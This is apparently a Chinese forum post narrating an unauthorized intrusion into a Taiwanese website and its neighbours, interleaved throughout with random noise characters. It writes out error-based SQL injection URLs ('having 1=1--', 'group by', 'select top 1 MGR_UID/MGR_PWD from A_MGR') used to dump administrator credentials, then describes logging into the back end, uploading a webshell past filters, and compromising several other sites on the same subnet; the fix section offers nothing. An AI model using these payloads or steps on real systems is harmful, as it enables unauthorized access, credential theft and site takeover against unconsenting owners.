发现一个注入点
& V. Q* O- B4 [1 v( p% `3 N [http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
6 I% Q+ U r) J; }" v% z- u" e+ d! A# G+ K7 C) [" Y& f
习惯性的加’having1=1--
e" i' s& ~) X0 J K( F. A" s7 j) q5 i# s0 ^/ h
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—# T" }% s$ ^# g: h/ h' l- F, Z8 c
& g |- k* i; a. `
0
+ S2 q; J( ^$ x6 @ X
) ~4 {1 N/ ?# g爆出Diary_A.dl_Title(这时候很激动啊)5 x7 T- _0 @( v5 L5 B- p5 A7 ]
- ?- M z* V f. x7 v0 k
那么继续
9 J# d/ N6 d8 K- `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—' C) W4 J* u# D3 c
3 x( X7 `( G! S+ |% K8 V. z; r4 [& ^
继续,一直爆下去
, J( A4 I/ d3 Q1 Z+ x) b' a: m
9 w4 h3 A D$ d0 A) R' J a爆到几个字段和表段 但是没找到需要的管理用户的字段: F7 i1 v) G+ \. c/ N
) S1 n* ]- x) x* s7 u蛋疼了 怎么办 然后去后台登陆页看源码4 ?# y& i8 y" T6 Q1 a" w
2 C- ]5 _$ Z2 Z0
' o& ^0 I( T% ]! }; a$ H& m3 [% H' e8 A: u
Input name= “ADUID”
! }# V) _/ y/ L: d2 nInput name= “ADPWD”
6 m! X9 F7 a+ u! }; _/ Y; K r' a
7 f9 O7 J# N( r! B9 x- M很幸运 找到了字段那就继续$ C! q( d# N) y L0 \/ Q4 L# ^
找到之后开始爆用户
& Q2 R: |5 d; M# O: ^7 thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—! O" c' ~' j B* D" W
爆密码 C$ z! l9 z+ ~8 e9 X a
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—2 U' T, @: f: L% l
测试了下 这个注入点只能爆到文章哪里的表 1 y% y0 R+ x0 Z( [% D+ c" `
; N5 u4 N+ ~3 b T. m头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
: A. R9 J6 j/ ?: e. d- X6 A4 s2 i" w8 A% S% |, o' y9 ?* M& l- |
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
( p" n6 z& S3 x9 B4 x6 u% y; i* G" u. V8 w/ l" o
4731 g& Z, B |4 O: J+ K: k8 U
( H$ i0 _) b: ?进后台 x- l: k, J( K3 V' t: C, E: |9 P
) W) a7 p! S/ Y+ G+ l
8 J2 w; m x3 S0 {2 e) ~发现几个上传点 有的地方不能上传 而且防止恶意代码+ H4 \5 d+ p0 i, l2 K6 q$ |
6 S* G% ^( k4 u: {9 N) J没办法 各种百度各种找大牛 找到一只好像可以突破的马/ z7 Y0 i! J! V* X$ w4 y' U
2 z; {, w8 i# K5 q3 _9 y
$ {2 v$ P3 y& b# T8 a在系统管理那里直接上传 不过没有显示地址
$ H7 x7 b+ K/ e. F# B @, M7 Q4 }' S$ ?
再上传一次 抓包 搞定OK5 W9 R8 b0 Z& G) {- s
1 _% g0 H) H- Y) D7 B9 n$ x( c. R6 x8 W$ ~! H. b! ~) z
) `" ~7 v- P a0 f4 B4 r4725 v8 ]( N; ?: |* G' @( @$ ^
. ?4 U* v1 ^; ~
晚上不行了 去睡觉。。。1 ~: R; ~( L) a3 h
第二天刚起床 闲的没事做继续日站吧 8 T5 m3 A# `8 Q1 R
9 P8 B- }* V9 j/ p4 L8 \
找个站 就把这个站的旁c扫了下- u& F( n) o# l* R" W
( _- _9 p7 X d) l. U6 b. P发现c段也有一个购物站 ,然后还和这个站的模板差不多
3 G3 C# s, f1 M+ i2 w v
7 _% v" y* \. t就找到会员登录口测试
v% _! i5 d+ G- I' d, I7 n1 o( u. j
'and (select top 1 MGR_UID from A_MGR)>0—6 ~6 `1 o# J1 u* e6 L" z
果断爆到了 这时候我很激动 通杀9 l& g% z0 L2 p \1 `* \
7 e; p; m6 d0 J8 S% G% I; `再次翻c段
6 z. R/ f/ n& H ?( B( k. W/ w$ k3 { Z% d- x) [
翻出几个站 都成功拿下9 ^9 B8 S. N0 \ o! N: X* p0 {" V5 {1 [
8 e: ?# q/ c) W- O3 M# c" D
1 G" D$ ?: ]2 m& C& U$ y# u6 d8 n1 G3 T! a4 P
修复方案:
8 Y0 x( r& \9 e8 |# C1 }1 g$ _! t他们比我专业
+ X$ W% n/ m, M. M' C- `- B0 c, ~0 \ w
: T( z; `- `7 L5 O0 s+ R% n. u2 B2 g' s! s! d
|